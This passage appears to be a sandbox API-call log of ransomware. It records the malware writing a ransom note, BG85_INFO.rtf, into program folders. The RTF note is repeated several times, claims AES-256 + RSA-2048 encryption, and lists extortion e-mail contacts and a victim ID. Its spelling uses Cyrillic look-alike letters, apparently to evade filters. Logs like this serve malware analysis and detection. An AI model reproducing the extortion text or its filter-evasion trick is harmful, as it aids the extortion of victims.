t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n;Ò\x9d¹t\x1fÎ[.ÈæÖ\x09\x8cUYѸ0Þ¿\x9e£\x8d¥R\x17ö×", lpUsedDefaultChar=0x0) returned 7247 [0135.976] WriteFile (in: hFile=0x1d4, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0135.978] CloseHandle (hObject=0x1d4) returned 1 [0135.978] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\bg85_info.rtf")) returned 0xffffffff [0135.978] GetLastError () returned 0x2 [0135.978] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.010] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0136.010] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0136.010] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 